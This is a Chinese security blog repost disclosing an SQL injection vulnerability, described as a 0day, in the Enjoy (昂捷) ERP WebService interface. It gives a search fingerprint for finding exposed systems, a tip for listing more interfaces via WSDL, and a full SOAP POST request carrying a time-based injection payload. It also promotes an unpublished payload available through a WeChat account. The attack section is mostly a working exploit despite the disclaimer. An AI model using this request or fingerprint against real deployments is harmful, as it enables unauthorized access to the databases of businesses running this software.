昂捷ERP接口SQL注入(0day在野)

admin 2023年11月22日16:18:53评论259 views字数 1003阅读3分20秒阅读模式

0x01 技术文章仅供参考学习,请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负责。本文所提供的技术信息或代码工具仅供于学习,一切不良后果与文章作者无关。使用者应该遵守法律法规,并尊重他人的合法权益。

0x02

指纹:body="/Scripts/EnjoyMsg.js"

昂捷ERP接口SQL注入(0day在野)

0x03 漏洞复现

注入类型是WebService接口的,访问url加上?wsdl可以直接使用burp的wsdl插件能看到更多接口进行测试。

昂捷ERP接口SQL注入(0day在野)

昂捷ERP接口SQL注入(0day在野)

数据包:

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1Host: xxxxxUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Connection: closeContent-Length: 369Accept: */*Accept-Language: enContent-Type: text/xml; charset=utf-8Accept-Encoding: gzip
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetOSpById xmlns="http://tempuri.org/"> <sId>1';waitfor delay '0:0:5'--+</sId> </GetOSpById> </soap:Body></soap:Envelope>

以上漏洞是有别的公众号写的但是还有别的存在注入。

下面这个是还没见外网有利用的,接口都差不多就是poc不一样。

昂捷ERP接口SQL注入(0day在野)

想要获取paylaod可以关注公众号回复"erp"来获取

原文始发于微信公众号(Kokoxca安全):昂捷ERP接口SQL注入(0day在野)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月22日16:18:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   昂捷ERP接口SQL注入(0day在野)https://cn-sec.com/archives/2229049.html

发表评论

匿名网友 填写信息